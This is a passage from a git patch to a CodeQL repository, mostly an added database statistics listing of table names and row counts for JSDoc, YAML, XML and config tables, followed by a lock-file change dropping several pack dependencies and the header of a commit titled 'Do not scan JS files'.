+7 +8 +4 + + +8 +10 +8 + + +10 +31 +7 + + +46 +59 +2 + + + + + + + + +jsdoc_tag_descriptions +13676 + + +tag +13676 + + +text +7866 + + + + +tag +text + + +12 + + +1 +2 +13676 + + + + + + +text +tag + + +12 + + +1 +2 +6089 + + +2 +3 +1025 + + +3 +8 +596 + + +8 +459 +156 + + + + + + + + +jsdoc_tag_names +11506 + + +tag +11506 + + +text +2647 + + + + +tag +text + + +12 + + +1 +2 +11506 + + + + + + +text +tag + + +12 + + +1 +2 +1398 + + +2 +3 +569 + + +3 +4 +201 + + +4 +7 +208 + + +7 +24 +200 + + +24 +498 +71 + + + + + + + + +jsdoc_type_exprs +id +22481 + + +id +22481 + + +kind +15 + + +parent +21039 + + +idx +17 + + +tostring +1447 + + + + +id +kind + + +12 + + +1 +2 +22481 + + + + + + +id +parent + + +12 + + +1 +2 +22481 + + + + + + +id +idx + + +12 + + +1 +2 +22481 + + + + + + +id +tostring + + +12 + + +1 +2 +22481 + + + + + + +kind +id + + +12 + + +8 +9 +1 + + +19 +20 +1 + + +27 +28 +1 + + +35 +36 +1 + + +55 +56 +1 + + +91 +92 +1 + + +287 +288 +1 + + +292 +293 +1 + + +303 +304 +1 + + +310 +311 +1 + + +316 +317 +1 + + +536 +537 +1 + + +668 +669 +1 + + +895 +896 +1 + + +18639 +18640 +1 + + + + + + +kind +parent + + +12 + + +8 +9 +1 + + +19 +20 +1 + + +23 +24 +1 + + +35 +36 +1 + + +55 +56 +1 + + +90 +91 +1 + + +287 +288 +2 + + +301 +302 +1 + + +310 +311 +1 + + +314 +315 +1 + + +524 +525 +1 + + +583 +584 +1 + + +890 +891 +1 + + +17717 +17718 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +3 + + +2 +3 +2 + + +3 +4 +5 + + +4 +5 +2 + + +5 +6 +1 + + +13 +14 +1 + + +16 +17 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +5 +6 +1 + + +6 +7 +1 + + +51 +52 +1 + + +57 +58 +1 + + +86 +87 +1 + + +89 +90 +1 + + +104 +105 +1 + + +155 +156 +1 + + +194 +195 +1 + + +696 +697 +1 + + + + + + +parent +id + + +12 + + +1 +2 +19985 + + +2 +16 +1054 + + + + + + +parent +kind + + +12 + + +1 +2 +20644 + + +2 +4 +395 + + + + + + +parent +idx + + +12 + + +1 +2 +19985 + + +2 +16 +1054 + + + + + + +parent +tostring + + +12 + + +1 +2 +19997 + + +2 +7 +1042 + + + + + + +idx +id + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +11 +12 +1 + + +23 +24 +1 + + +32 +33 +1 + + +93 +94 +1 + + +165 +166 +1 + + +340 +341 +1 + + +750 +751 +1 + + +21021 +21022 +1 + + + + + + +idx +kind + + +12 + + +1 +2 +5 + + +2 +3 +7 + + +5 +6 +1 + + +6 +7 +1 + + +10 +11 +1 + + +11 +12 +1 + + +13 +14 +1 + + + + + + +idx +parent + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +11 +12 +1 + + +23 +24 +1 + + +32 +33 +1 + + +93 +94 +1 + + +165 +166 +1 + + +340 +341 +1 + + +750 +751 +1 + + +21021 +21022 +1 + + + + + + +idx +tostring + + +12 + + +2 +3 +2 + + +3 +4 +3 + + +4 +5 +3 + + +5 +6 +1 + + +6 +7 +1 + + +11 +12 +1 + + +17 +18 +1 + + +21 +22 +1 + + +23 +24 +1 + + +42 +43 +1 + + +103 +104 +1 + + +1378 +1379 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +713 + + +2 +3 +271 + + +3 +4 +105 + + +4 +6 +110 + + +6 +12 +111 + + +12 +77 +109 + + +77 +2754 +28 + + + + + + +tostring +kind + + +12 + + +1 +2 +1446 + + +2 +3 +1 + + + + + + +tostring +parent + + +12 + + +1 +2 +713 + + +2 +3 +271 + + +3 +4 +105 + + +4 +6 +110 + + +6 +12 +112 + + +12 +78 +110 + + +78 +2747 +26 + + + + + + +tostring +idx + + +12 + + +1 +2 +1356 + + +2 +15 +91 + + + + + + + + +jsdoc_record_field_name +241 + + +id +90 + + +idx +15 + + +name +123 + + + + +id +idx + + +12 + + +1 +2 +47 + + +2 +3 +19 + + +3 +4 +8 + + +4 +7 +8 + + +7 +16 +8 + + + + + + +id +name + + +12 + + +1 +2 +47 + + +2 +3 +19 + + +3 +4 +8 + + +4 +7 +8 + + +7 +16 +8 + + + + + + +idx +id + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +10 +11 +1 + + +12 +13 +1 + + +16 +17 +1 + + +24 +25 +1 + + +43 +44 +1 + + +90 +91 +1 + + + + + + +idx +name + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +3 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +12 +13 +1 + + +13 +14 +1 + + +18 +19 +1 + + +29 +30 +1 + + +37 +38 +1 + + + + + + +name +id + + +12 + + +1 +2 +65 + + +2 +3 +40 + + +3 +4 +6 + + +4 +7 +10 + + +9 +25 +2 + + + + + + +name +idx + + +12 + + +1 +2 +87 + + +2 +3 +34 + + +3 +4 +2 + + + + + + + + +jsdoc_prefix_qualifier +823 + + +id +823 + + + + + +jsdoc_has_new_parameter +22 + + +fn +22 + + + + + +jsdoc_errors +id +1658 + + +id +1658 + + +tag +1460 + + +message +203 + + +tostring +89 + + + + +id +tag + + +12 + + +1 +2 +1658 + + + + + + +id +message + + +12 + + +1 +2 +1658 + + + + + + +id +tostring + + +12 + + +1 +2 +1658 + + + + + + +tag +id + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +tag +message + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +tag +tostring + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +message +id + + +12 + + +1 +2 +144 + + +2 +3 +27 + + +3 +7 +16 + + +7 +347 +16 + + + + + + +message +tag + + +12 + + +1 +2 +144 + + +2 +3 +27 + + +3 +7 +16 + + +7 +347 +16 + + + + + + +message +tostring + + +12 + + +1 +2 +203 + + + + + + +tostring +id + + +12 + + +1 +2 +48 + + +2 +3 +10 + + +3 +4 +3 + + +4 +5 +6 + + +5 +8 +7 + + +11 +27 +7 + + +34 +347 +7 + + +477 +478 +1 + + + + + + +tostring +tag + + +12 + + +1 +2 +48 + + +2 +3 +10 + + +3 +4 +3 + + +4 +5 +6 + + +5 +8 +7 + + +11 +27 +7 + + +34 +347 +7 + + +477 +478 +1 + + + + + + +tostring +message + + +12 + + +1 +2 +66 + + +2 +3 +6 + + +3 +4 +3 + + +4 +7 +7 + + +8 +25 +7 + + + + + + + + +yaml +id +885 + + +id +885 + + +kind +4 + + +parent +204 + + +idx +25 + + +tag +8 + + +tostring +318 + + + + +id +kind + + +12 + + +1 +2 +885 + + + + + + +id +parent + + +12 + + +1 +2 +885 + + + + + + +id +idx + + +12 + + +1 +2 +885 + + + + + + +id +tag + + +12 + + +1 +2 +885 + + + + + + +id +tostring + + +12 + + +1 +2 +885 + + + + + + +kind +id + + +12 + + +1 +2 +1 + + +35 +36 +1 + + +149 +150 +1 + + +700 +701 +1 + + + + + + +kind +parent + + +12 + + +1 +2 +1 + + +33 +34 +1 + + +90 +91 +1 + + +183 +184 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +1 + + +7 +8 +1 + + +11 +12 +1 + + +25 +26 +1 + + + + + + +kind +tag + + +12 + + +1 +2 +3 + + +5 +6 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +1 + + +10 +11 +1 + + +67 +68 +1 + + +240 +241 +1 + + + + + + +parent +id + + +12 + + +1 +2 +33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +6 +7 +29 + + +8 +11 +14 + + +12 +21 +17 + + +22 +25 +2 + + + + + + +parent +kind + + +12 + + +1 +2 +131 + + +2 +3 +43 + + +3 +4 +30 + + + + + + +parent +idx + + +12 + + +1 +2 +33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +6 +7 +29 + + +8 +11 +14 + + +12 +21 +17 + + +22 +25 +2 + + + + + + +parent +tag + + +12 + + +1 +2 +120 + + +2 +3 +41 + + +3 +4 +36 + + +4 +5 +7 + + + + + + +parent +tostring + + +12 + + +1 +2 +33 + + +2 +3 +72 + + +3 +4 +2 + + +4 +5 +35 + + +5 +6 +5 + + +6 +7 +24 + + +8 +11 +14 + + +12 +14 +16 + + +16 +23 +3 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +7 + + +5 +20 +2 + + +20 +25 +2 + + +25 +33 +2 + + +33 +56 +2 + + +61 +64 +2 + + +95 +100 +2 + + +149 +172 +2 + + + + + + +idx +kind + + +12 + + +1 +2 +14 + + +2 +3 +4 + + +3 +4 +6 + + +4 +5 +1 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +7 + + +5 +20 +2 + + +20 +25 +2 + + +25 +33 +2 + + +33 +56 +2 + + +61 +64 +2 + + +95 +100 +2 + + +149 +172 +2 + + + + + + +idx +tag + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +4 +3 + + +4 +5 +4 + + +6 +7 +2 + + + + + + +idx +tostring + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +3 +4 +3 + + +4 +5 +4 + + +5 +7 +2 + + +7 +11 +2 + + +12 +15 +2 + + +15 +16 +1 + + +18 +19 +2 + + +28 +31 +2 + + +52 +56 +2 + + +87 +88 +1 + + + + + + +tag +id + + +12 + + +1 +2 +2 + + +4 +5 +1 + + +15 +16 +1 + + +26 +27 +1 + + +35 +36 +1 + + +149 +150 +1 + + +654 +655 +1 + + + + + + +tag +kind + + +12 + + +1 +2 +8 + + + + + + +tag +parent + + +12 + + +1 +2 +2 + + +2 +3 +1 + + +3 +4 +1 + + +25 +26 +1 + + +33 +34 +1 + + +90 +91 +1 + + +183 +184 +1 + + + + + + +tag +idx + + +12 + + +1 +2 +2 + + +3 +4 +2 + + +7 +8 +1 + + +9 +10 +1 + + +11 +12 +1 + + +23 +24 +1 + + + + + + +tag +tostring + + +12 + + +1 +2 +3 + + +2 +3 +1 + + +10 +11 +1 + + +13 +14 +1 + + +67 +68 +1 + + +223 +224 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +209 + + +2 +3 +42 + + +3 +6 +29 + + +6 +15 +25 + + +15 +18 +13 + + + + + + +tostring +kind + + +12 + + +1 +2 +318 + + + + + + +tostring +parent + + +12 + + +1 +2 +213 + + +2 +3 +41 + + +3 +6 +27 + + +6 +15 +25 + + +15 +18 +12 + + + + + + +tostring +idx + + +12 + + +1 +2 +272 + + +2 +3 +34 + + +3 +10 +12 + + + + + + +tostring +tag + + +12 + + +1 +2 +318 + + + + + + + + +yaml_anchors +1 + + +node +1 + + +anchor +1 + + + + +node +anchor + + +12 + + +1 +2 +1 + + + + + + +anchor +node + + +12 + + +1 +2 +1 + + + + + + + + +yaml_aliases +1 + + +alias +1 + + +target +1 + + + + +alias +target + + +12 + + +1 +2 +1 + + + + + + +target +alias + + +12 + + +1 +2 +1 + + + + + + + + +yaml_scalars +700 + + +scalar +700 + + +style +3 + + +value +241 + + + + +scalar +style + + +12 + + +1 +2 +700 + + + + + + +scalar +value + + +12 + + +1 +2 +700 + + + + + + +style +scalar + + +12 + + +14 +15 +1 + + +97 +98 +1 + + +589 +590 +1 + + + + + + +style +value + + +12 + + +12 +13 +1 + + +47 +48 +1 + + +183 +184 +1 + + + + + + +value +scalar + + +12 + + +1 +2 +158 + + +2 +3 +32 + + +3 +6 +19 + + +6 +15 +20 + + +15 +18 +12 + + + + + + +value +style + + +12 + + +1 +2 +240 + + +2 +3 +1 + + + + + + + + +yaml_errors +id +1 + + +id +1 + + +message +1 + + + + +id +message + + +12 + + +1 +2 +1 + + + + + + +message +id + + +12 + + +1 +2 +1 + + + + + + + + +yaml_locations +71 + + +locatable +71 + + +location +71 + + + + +locatable +location + + +12 + + +1 +2 +71 + + + + + + +location +locatable + + +12 + + +1 +2 +71 + + + + + + + + +xmlEncoding +39724 + + +id +39724 + + +encoding +1 + + + + +id +encoding + + +12 + + +1 +2 +39724 + + + + + + +encoding +id + + +12 + + +39724 +39725 +1 + + + + + + + + +xmlDTDs +1 + + +id +1 + + +root +1 + + +publicId +1 + + +systemId +1 + + +fileid +1 + + + + +id +root + + +12 + + +1 +2 +1 + + + + + + +id +publicId + + +12 + + +1 +2 +1 + + + + + + +id +systemId + + +12 + + +1 +2 +1 + + + + + + +id +fileid + + +12 + + +1 +2 +1 + + + + + + +root +id + + +12 + + +1 +2 +1 + + + + + + +root +publicId + + +12 + + +1 +2 +1 + + + + + + +root +systemId + + +12 + + +1 +2 +1 + + + + + + +root +fileid + + +12 + + +1 +2 +1 + + + + + + +publicId +id + + +12 + + +1 +2 +1 + + + + + + +publicId +root + + +12 + + +1 +2 +1 + + + + + + +publicId +systemId + + +12 + + +1 +2 +1 + + + + + + +publicId +fileid + + +12 + + +1 +2 +1 + + + + + + +systemId +id + + +12 + + +1 +2 +1 + + + + + + +systemId +root + + +12 + + +1 +2 +1 + + + + + + +systemId +publicId + + +12 + + +1 +2 +1 + + + + + + +systemId +fileid + + +12 + + +1 +2 +1 + + + + + + +fileid +id + + +12 + + +1 +2 +1 + + + + + + +fileid +root + + +12 + + +1 +2 +1 + + + + + + +fileid +publicId + + +12 + + +1 +2 +1 + + + + + + +fileid +systemId + + +12 + + +1 +2 +1 + + + + + + + + +xmlElements +1270313 + + +id +1270313 + + +name +4655 + + +parentid +578021 + + +idx +35122 + + +fileid +39721 + + + + +id +name + + +12 + + +1 +2 +1270313 + + + + + + +id +parentid + + +12 + + +1 +2 +1270313 + + + + + + +id +idx + + +12 + + +1 +2 +1270313 + + + + + + +id +fileid + + +12 + + +1 +2 +1270313 + + + + + + +name +id + + +12 + + +1 +2 +420 + + +2 +5 +156 + + +5 +6 +3832 + + +6 +310317 +247 + + + + + + +name +parentid + + +12 + + +1 +2 +456 + + +2 +5 +150 + + +5 +6 +3829 + + +6 +161565 +220 + + + + + + +name +idx + + +12 + + +1 +2 +4358 + + +2 +35123 +297 + + + + + + +name +fileid + + +12 + + +1 +2 +486 + + +2 +5 +133 + + +5 +6 +3831 + + +6 +14503 +205 + + + + + + +parentid +id + + +12 + + +1 +2 +371969 + + +2 +3 +62095 + + +3 +4 +104113 + + +4 +35123 +39844 + + + + + + +parentid +name + + +12 + + +1 +2 +500482 + + +2 +3 +17866 + + +3 +4 +49117 + + +4 +45 +10556 + + + + + + +parentid +idx + + +12 + + +1 +2 +371969 + + +2 +3 +62095 + + +3 +4 +104113 + + +4 +35123 +39844 + + + + + + +parentid +fileid + + +12 + + +1 +2 +578021 + + + + + + +idx +id + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +578022 +2083 + + + + + + +idx +name + + +12 + + +1 +2 +18457 + + +2 +3 +6533 + + +3 +4 +6178 + + +4 +8 +2624 + + +8 +4397 +1330 + + + + + + +idx +parentid + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +578022 +2083 + + + + + + +idx +fileid + + +12 + + +2 +3 +606 + + +4 +5 +17851 + + +5 +6 +6533 + + +6 +7 +859 + + +7 +8 +4471 + + +9 +16 +2719 + + +16 +39722 +2083 + + + + + + +fileid +id + + +12 + + +1 +2 +20457 + + +2 +3 +3115 + + +3 +7 +3026 + + +7 +8 +3588 + + +8 +9 +2220 + + +9 +11 +3099 + + +11 +19 +3087 + + +19 +114506 +1129 + + + + + + +fileid +name + + +12 + + +1 +2 +20459 + + +2 +3 +3458 + + +3 +5 +2569 + + +5 +7 +2172 + + +7 +8 +6158 + + +8 +9 +3501 + + +9 +46 +1404 + + + + + + +fileid +parentid + + +12 + + +1 +2 +20457 + + +2 +3 +3870 + + +3 +5 +2152 + + +5 +6 +2876 + + +6 +7 +2720 + + +7 +8 +4132 + + +8 +14 +3096 + + +14 +31079 +418 + + + + + + +fileid +idx + + +12 + + +1 +2 +25894 + + +2 +3 +5301 + + +3 +4 +3787 + + +4 +6 +3268 + + +6 +35123 +1471 + + + + + + + + +xmlAttrs +1202020 + + +id +1202020 + + +elementid +760198 + + +name +3649 + + +value +121803 + + +idx +2000 + + +fileid +39448 + + + + +id +elementid + + +12 + + +1 +2 +1202020 + + + + + + +id +name + + +12 + + +1 +2 +1202020 + + + + + + +id +value + + +12 + + +1 +2 +1202020 + + + + + + +id +idx + + +12 + + +1 +2 +1202020 + + + + + + +id +fileid + + +12 + + +1 +2 +1202020 + + + + + + +elementid +id + + +12 + + +1 +2 +425697 + + +2 +3 +249659 + + +3 +4 +66474 + + +4 +2001 +18368 + + + + + + +elementid +name + + +12 + + +1 +2 +425778 + + +2 +3 +249579 + + +3 +4 +66475 + + +4 +2001 +18366 + + + + + + +elementid +value + + +12 + + +1 +2 +466237 + + +2 +3 +266291 + + +3 +46 +27670 + + + + + + +elementid +idx + + +12 + + +1 +2 +425697 + + +2 +3 +249659 + + +3 +4 +66474 + + +4 +2001 +18368 + + + + + + +elementid +fileid + + +12 + + +1 +2 +760198 + + + + + + +name +id + + +12 + + +1 +2 +3467 + + +2 +262475 +182 + + + + + + +name +elementid + + +12 + + +1 +2 +3467 + + +2 +262475 +182 + + + + + + +name +value + + +12 + + +1 +2 +3501 + + +2 +54146 +148 + + + + + + +name +idx + + +12 + + +1 +2 +3531 + + +2 +11 +118 + + + + + + +name +fileid + + +12 + + +1 +2 +3491 + + +2 +21768 +158 + + + + + + +value +id + + +12 + + +1 +2 +72032 + + +2 +3 +42366 + + +3 +199269 +7405 + + + + + + +value +elementid + + +12 + + +1 +2 +72036 + + +2 +3 +42374 + + +3 +199269 +7393 + + + + + + +value +name + + +12 + + +1 +2 +116722 + + +2 +2041 +5081 + + + + + + +value +idx + + +12 + + +1 +2 +117957 + + +2 +2001 +3846 + + + + + + +value +fileid + + +12 + + +1 +2 +86306 + + +2 +3 +28570 + + +3 +4175 +6927 + + + + + + +idx +id + + +12 + + +1 +2 +1955 + + +2 +760199 +45 + + + + + + +idx +elementid + + +12 + + +1 +2 +1955 + + +2 +760199 +45 + + + + + + +idx +name + + +12 + + +1 +2 +1955 + + +2 +189 +45 + + + + + + +idx +value + + +12 + + +1 +2 +1955 + + +2 +116643 +45 + + + + + + +idx +fileid + + +12 + + +1 +2 +1955 + + +2 +39449 +45 + + + + + + +fileid +id + + +12 + + +1 +2 +22884 + + +2 +4 +2565 + + +4 +6 +2294 + + +6 +7 +3299 + + +7 +9 +3272 + + +9 +16 +3143 + + +16 +129952 +1991 + + + + + + +fileid +elementid + + +12 + + +1 +2 +23890 + + +2 +4 +2131 + + +4 +5 +1971 + + +5 +6 +4096 + + +6 +8 +3519 + + +8 +16 +3137 + + +16 +106600 +704 + + + + + + +fileid +name + + +12 + + +1 +2 +22946 + + +2 +3 +2338 + + +3 +4 +2726 + + +4 +5 +2824 + + +5 +6 +2994 + + +6 +7 +3876 + + +7 +2002 +1744 + + + + + + +fileid +value + + +12 + + +1 +2 +22916 + + +2 +4 +2772 + + +4 +5 +2112 + + +5 +6 +3510 + + +6 +8 +1993 + + +8 +11 +3365 + + +11 +50357 +2780 + + + + + + +fileid +idx + + +12 + + +1 +2 +26133 + + +2 +3 +9699 + + +3 +5 +3511 + + +5 +2001 +105 + + + + + + + + +xmlNs +71201 + + +id +4185 + + +prefixName +958 + + +URI +4185 + + +fileid +39544 + + + + +id +prefixName + + +12 + + +1 +2 +2602 + + +2 +3 +1553 + + +3 +872 +30 + + + + + + +id +URI + + +12 + + +1 +2 +4185 + + + + + + +id +fileid + + +12 + + +1 +6 +274 + + +6 +7 +3825 + + +7 +24905 +86 + + + + + + +prefixName +id + + +12 + + +1 +2 +915 + + +2 +4054 +43 + + + + + + +prefixName +URI + + +12 + + +1 +2 +915 + + +2 +4054 +43 + + + + + + +prefixName +fileid + + +12 + + +1 +2 +828 + + +2 +5 +73 + + +5 +24903 +57 + + + + + + +URI +id + + +12 + + +1 +2 +4185 + + + + + + +URI +prefixName + + +12 + + +1 +2 +2602 + + +2 +3 +1553 + + +3 +872 +30 + + + + + + +URI +fileid + + +12 + + +1 +6 +274 + + +6 +7 +3825 + + +7 +24905 +86 + + + + + + +fileid +id + + +12 + + +1 +2 +11655 + + +2 +3 +26146 + + +3 +8 +1743 + + + + + + +fileid +prefixName + + +12 + + +1 +2 +11653 + + +2 +3 +25982 + + +3 +31 +1909 + + + + + + +fileid +URI + + +12 + + +1 +2 +11655 + + +2 +3 +26146 + + +3 +8 +1743 + + + + + + + + +xmlHasNs +1139730 + + +elementId +1139730 + + +nsId +4136 + + +fileid +39537 + + + + +elementId +nsId + + +12 + + +1 +2 +1139730 + + + + + + +elementId +fileid + + +12 + + +1 +2 +1139730 + + + + + + +nsId +elementId + + +12 + + +1 +5 +234 + + +5 +6 +3824 + + +6 +643289 +78 + + + + + + +nsId +fileid + + +12 + + +1 +5 +257 + + +5 +6 +3823 + + +6 +24759 +56 + + + + + + +fileid +elementId + + +12 + + +1 +2 +3669 + + +2 +3 +20429 + + +3 +7 +2536 + + +7 +8 +3473 + + +8 +9 +2258 + + +9 +11 +3036 + + +11 +18 +2966 + + +18 +147552 +1170 + + + + + + +fileid +nsId + + +12 + + +1 +2 +18261 + + +2 +3 +21032 + + +3 +8 +244 + + + + + + + + +xmlComments +26812 + + +id +26812 + + +text +22933 + + +parentid +26546 + + +fileid +26368 + + + + +id +text + + +12 + + +1 +2 +26812 + + + + + + +id +parentid + + +12 + + +1 +2 +26812 + + + + + + +id +fileid + + +12 + + +1 +2 +26812 + + + + + + +text +id + + +12 + + +1 +2 +21517 + + +2 +62 +1416 + + + + + + +text +parentid + + +12 + + +1 +2 +21519 + + +2 +62 +1414 + + + + + + +text +fileid + + +12 + + +1 +2 +21522 + + +2 +62 +1411 + + + + + + +parentid +id + + +12 + + +1 +2 +26379 + + +2 +17 +167 + + + + + + +parentid +text + + +12 + + +1 +2 +26379 + + +2 +17 +167 + + + + + + +parentid +fileid + + +12 + + +1 +2 +26546 + + + + + + +fileid +id + + +12 + + +1 +2 +26161 + + +2 +17 +207 + + + + + + +fileid +text + + +12 + + +1 +2 +26165 + + +2 +17 +203 + + + + + + +fileid +parentid + + +12 + + +1 +2 +26223 + + +2 +10 +145 + + + + + + + + +xmlChars +439958 + + +id +439958 + + +text +100518 + + +parentid +433851 + + +idx +4 + + +isCDATA +1 + + +fileid +26494 + + + + +id +text + + +12 + + +1 +2 +439958 + + + + + + +id +parentid + + +12 + + +1 +2 +439958 + + + + + + +id +idx + + +12 + + +1 +2 +439958 + + + + + + +id +isCDATA + + +12 + + +1 +2 +439958 + + + + + + +id +fileid + + +12 + + +1 +2 +439958 + + + + + + +text +id + + +12 + + +1 +2 +60389 + + +2 +4 +3811 + + +4 +5 +29257 + + +5 +23171 +7061 + + + + + + +text +parentid + + +12 + + +1 +2 +60389 + + +2 +4 +3811 + + +4 +5 +29257 + + +5 +23171 +7061 + + + + + + +text +idx + + +12 + + +1 +2 +100517 + + +2 +3 +1 + + + + + + +text +isCDATA + + +12 + + +1 +2 +100518 + + + + + + +text +fileid + + +12 + + +1 +2 +61284 + + +2 +4 +4205 + + +4 +5 +28328 + + +5 +351 +6701 + + + + + + +parentid +id + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +text + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +idx + + +12 + + +1 +2 +429716 + + +2 +5 +4135 + + + + + + +parentid +isCDATA + + +12 + + +1 +2 +433851 + + + + + + +parentid +fileid + + +12 + + +1 +2 +433851 + + + + + + +idx +id + + +12 + + +80 +81 +1 + + +1892 +1893 +1 + + +4135 +4136 +1 + + +433851 +433852 +1 + + + + + + +idx +text + + +12 + + +1 +2 +1 + + +3 +4 +1 + + +16 +17 +1 + + +100499 +100500 +1 + + + + + + +idx +parentid + + +12 + + +80 +81 +1 + + +1892 +1893 +1 + + +4135 +4136 +1 + + +433851 +433852 +1 + + + + + + +idx +isCDATA + + +12 + + +1 +2 +4 + + + + + + +idx +fileid + + +12 + + +4 +5 +1 + + +46 +47 +1 + + +97 +98 +1 + + +26494 +26495 +1 + + + + + + +isCDATA +id + + +12 + + +439958 +439959 +1 + + + + + + +isCDATA +text + + +12 + + +100518 +100519 +1 + + + + + + +isCDATA +parentid + + +12 + + +433851 +433852 +1 + + + + + + +isCDATA +idx + + +12 + + +4 +5 +1 + + + + + + +isCDATA +fileid + + +12 + + +26494 +26495 +1 + + + + + + +fileid +id + + +12 + + +1 +2 +25303 + + +2 +35123 +1191 + + + + + + +fileid +text + + +12 + + +1 +2 +25765 + + +2 +35123 +729 + + + + + + +fileid +parentid + + +12 + + +1 +2 +25312 + + +2 +35123 +1182 + + + + + + +fileid +idx + + +12 + + +1 +2 +26397 + + +2 +5 +97 + + + + + + +fileid +isCDATA + + +12 + + +1 +2 +26494 + + + + + + + + +xmllocations +3051056 + + +xmlElement +2982460 + + +location +3051056 + + + + +xmlElement +location + + +12 + + +1 +2 +2978326 + + +2 +24903 +4134 + + + + + + +location +xmlElement + + +12 + + +1 +2 +3051056 + + + + + + + + +filetype +1102 + + +file +1102 + + +filetype +3 + + + + +file +filetype + + +12 + + +1 +2 +1102 + + + + + + +filetype +file + + +12 + + +1 +2 +1 + + +162 +163 +1 + + +939 +940 +1 + + + + + + + + +configs +69795 + + +id +69795 + + + + + +configNames +69794 + + +id +69794 + + +config +69794 + + +name +12859 + + + + +id +config + + +12 + + +1 +2 +69794 + + + + + + +id +name + + +12 + + +1 +2 +69794 + + + + + + +config +id + + +12 + + +1 +2 +69794 + + + + + + +config +name + + +12 + + +1 +2 +69794 + + + + + + +name +id + + +12 + + +1 +2 +4858 + + +2 +3 +593 + + +3 +4 +2806 + + +4 +10 +169 + + +10 +11 +1900 + + +11 +12 +1757 + + +12 +111 +776 + + + + + + +name +config + + +12 + + +1 +2 +4858 + + +2 +3 +593 + + +3 +4 +2806 + + +4 +10 +169 + + +10 +11 +1900 + + +11 +12 +1757 + + +12 +111 +776 + + + + + + + + +configValues +69691 + + +id +69691 + + +config +69691 + + +value +54399 + + + + +id +config + + +12 + + +1 +2 +69691 + + + + + + +id +value + + +12 + + +1 +2 +69691 + + + + + + +config +id + + +12 + + +1 +2 +69691 + + + + + + +config +value + + +12 + + +1 +2 +69691 + + + + + + +value +id + + +12 + + +1 +2 +48220 + + +2 +4 +4804 + + +4 +546 +1375 + + + + + + +value +config + + +12 + + +1 +2 +48220 + + +2 +4 +4804 + + +4 +546 +1375 + + + + + + + + +configLocations +209280 + + +locatable +209280 + + +location +209280 + + + + +locatable +location + + +12 + + +1 +2 +209280 + + + + + + +location +locatable + + +12 + + +1 +2 +209280 + + + + + + + + +extraction_time +378 + + +file +21 + + +extractionPhase +9 + + +timerKind +2 + + +time +43 + + + + +file +extractionPhase + + +12 + + +9 +10 +21 + + + + + + +file +timerKind + + +12 + + +2 +3 +21 + + + + + + +file +time + + +12 + + +3 +4 +21 + + + + + + +extractionPhase +file + + +12 + + +21 +22 +9 + + + + + + +extractionPhase +timerKind + + +12 + + +2 +3 +9 + + + + + + +extractionPhase +time + + +12 + + +1 +2 +8 + + +42 +43 +1 + + + + + + +timerKind +file + + +12 + + +21 +22 +2 + + + + + + +timerKind +extractionPhase + + +12 + + +9 +10 +2 + + + + + + +timerKind +time + + +12 + + +22 +23 +2 + + + + + + +time +file + + +12 + + +1 +2 +42 + + +21 +22 +1 + + + + + + +time +extractionPhase + + +12 + + +1 +2 +42 + + +8 +9 +1 + + + + + + +time +timerKind + + +12 + + +1 +2 +42 + + +2 +3 +1 + + + + + + + + +extraction_data +21 + + +file +21 + + +cacheFile +21 + + +fromCache +1 + + +length +21 + + + + +file +cacheFile + + +12 + + +1 +2 +21 + + + + + + +file +fromCache + + +12 + + +1 +2 +21 + + + + + + +file +length + + +12 + + +1 +2 +21 + + + + + + +cacheFile +file + + +12 + + +1 +2 +21 + + + + + + +cacheFile +fromCache + + +12 + + +1 +2 +21 + + + + + + +cacheFile +length + + +12 + + +1 +2 +21 + + + + + + +fromCache +file + + +12 + + +21 +22 +1 + + + + + + +fromCache +cacheFile + + +12 + + +21 +22 +1 + + + + + + +fromCache +length + + +12 + + +21 +22 +1 + + + + + + +length +file + + +12 + + +1 +2 +21 + + + + + + +length +cacheFile + + +12 + + +1 +2 +21 + + + + + + +length +fromCache + + +12 + + +1 +2 +21 + + + + + + + + + diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 82795df00063..4b8239b7f6ca 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -5,22 +5,12 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/javascript-all: - version: 1.0.0 - codeql/mad: - version: 1.0.0 - codeql/regex: - version: 1.0.0 codeql/ssa: version: 1.0.0 - codeql/tutorial: - version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 - codeql/xml: - version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false From ceac1c6392ff107ed5aea4a819f17abf7bfed141 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:50:53 +0200 Subject: [PATCH 335/707] Do not scan JS files --- .github/action/dist/index.js | 1 + 